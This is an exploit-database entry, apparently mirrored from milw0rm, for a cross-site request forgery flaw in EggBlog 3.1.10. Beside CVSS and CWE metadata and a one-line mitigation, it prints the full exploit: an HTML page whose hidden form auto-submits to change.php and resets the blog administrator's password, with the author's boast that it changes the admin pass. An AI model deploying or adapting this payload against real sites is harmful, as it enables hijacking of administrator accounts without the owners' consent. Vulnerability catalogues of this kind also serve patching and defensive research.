header-logo
Suggest Exploit
vendor:
EggBlog
by:
x0r
7.8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: EggBlog
Affected Version From: 3.1.10
Affected Version To: 3.1.10
Patch Exists: N/A
Related CWE: N/A
CPE: a:eggblog:eggblog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

EggBlog v 3.1.10

This exploit allows an attacker to change the admin password of EggBlog v 3.1.10 using Cross-Site Request Forgery (CSRF). The attacker can craft a malicious HTML page with a form that submits to the vulnerable change.php page, which will then change the admin password.

Mitigation:

The application should verify that the request is coming from an authorized user and not from an attacker.
Source

Exploit-DB raw data:

|                                                                        | 
| Project: EggBlog v 3.1.10                                              |
| Author: x0r                                                            |
| Email: andry2000[at]hotmail[dot]it                                     |
|________________________________________________________________________|
       
Code:

        <html>
        <title>x0r :P </title>
                        <form id="forum-form" name="forumform"
method="post" action="http://[site]/[path]/change.php">                    
    
                                                <input type="hidden"
size="30" id="forumpassword" name="password" />
                                                <input type="hidden"
name="submit" value="Submit" />
<script>document.forumform.submit()</script> 
       
                        </form>
        </HTML>

 With this csrf you can change the admin pass ^ ^

# milw0rm.com [2009-01-01]